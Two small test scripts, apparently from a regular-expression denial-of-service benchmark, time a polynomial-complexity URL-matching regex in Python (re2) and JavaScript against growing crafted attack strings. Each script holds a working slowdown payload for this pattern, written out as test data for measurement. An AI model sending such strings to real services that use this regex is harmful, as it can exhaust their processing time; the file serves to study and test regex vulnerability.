File: regexlib/2021-5-15/python_re2_test_file/regexlib_2336.py
# 2336
# (([\w-]+://?|www[.])[^\s()<>]+)
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:""+"1"*10000+"! _1@1 _SLQ_1"

import re2 as re
from time import perf_counter

regex = """(([\w-]+://?|www[.])[^\s()<>]+)"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "1" * i * 10000 + "! _1@1 _SLQ_1"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_2336.js
/* 2336
 * (([\w-]+://?|www[.])[^\s()<>]+)
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:""+"1"*20000+"! _1@1 _SLQ_1"
 */
var REGEX = new RegExp("(([\w-]+://?|www[.])[^\s()<>]+)")
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '1'.repeat(i*10000) + '! _1@1 _SLQ_1'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}